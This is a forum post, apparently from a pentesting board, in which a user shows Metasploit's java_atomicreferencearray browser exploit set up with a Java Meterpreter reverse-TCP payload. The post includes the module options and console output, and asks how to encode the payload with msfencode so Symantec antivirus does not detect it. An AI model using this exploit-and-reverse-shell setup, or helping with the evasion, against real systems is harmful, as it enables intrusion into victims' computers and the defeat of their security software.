hello all,

i have a question about evading AV with javascript payload. Here is my situation:

I am running BT 5. uname is -
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

I have updated BT with msfupdate. I am using the 'exploit/multi/browser/java_atomicreferencearray' with payload=java/meterpreter/reverse_tcp. I dont have any problems running this exploit, but when the client connects, the payload is picked up by symantc antivirus as 'Trojan.Maljava!gen22'

Here are the exploit options:
msf exploit(java_atomicreferencearray) > show options
Module options (exploit/multi/browser/java_atomicreferencearray):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST yes The local host to listen on. This must be an address on the local machine or
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH javasploit no The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port

Here is the output when the exploit is run:
msf exploit(java_atomicreferencearray) > exploit[*] Exploit running as background job.[*] Started reverse handler on[*] Using URL:[*] Local IP:
msf exploit(java_atomicreferencearray) >[*] Server started.[*] java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability[*] java_atomicreferencearray - Generated jar to drop (5287 bytes).[*] java_atomicreferencearray - Sending jar[*] java_atomicreferencearray - Sending jar[*] java_atomicreferencearray - Sending jar

I have tried using some of the 'evasion' options within the java exploit but have not had any success. My question is - is there a way to encode the payload with msfencode to successfully bypass AV detection? Let me know if you need more info. thanks in advance!